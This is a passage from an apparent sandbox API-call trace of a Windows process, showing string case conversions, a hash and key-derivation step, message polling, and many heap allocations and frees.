lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.615] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.616] CryptHashData (hHash=0xaa58a0, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0265.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.616] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.616] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.616] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.616] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0265.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.616] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0265.616] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.617] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.617] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.617] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa58a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5760) returned 1 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2150 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.617] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.617] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b40 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.618] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.618] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.619] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2140 [0265.619] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.620] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.621] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1d0 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.622] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.622] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.622] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0265.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.623] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0265.623] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.623] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2130 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2120 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2130 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.624] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.624] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0265.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.625] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.625] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e40 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fa8 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0265.626] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e40 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ee8 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e88 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9eb8 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9fd8 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8a8 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24ac9f0 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b70 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d20 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e28 [0265.627] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9648 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa128 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.628] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa8c0 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0265.628] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.628] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.629] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: 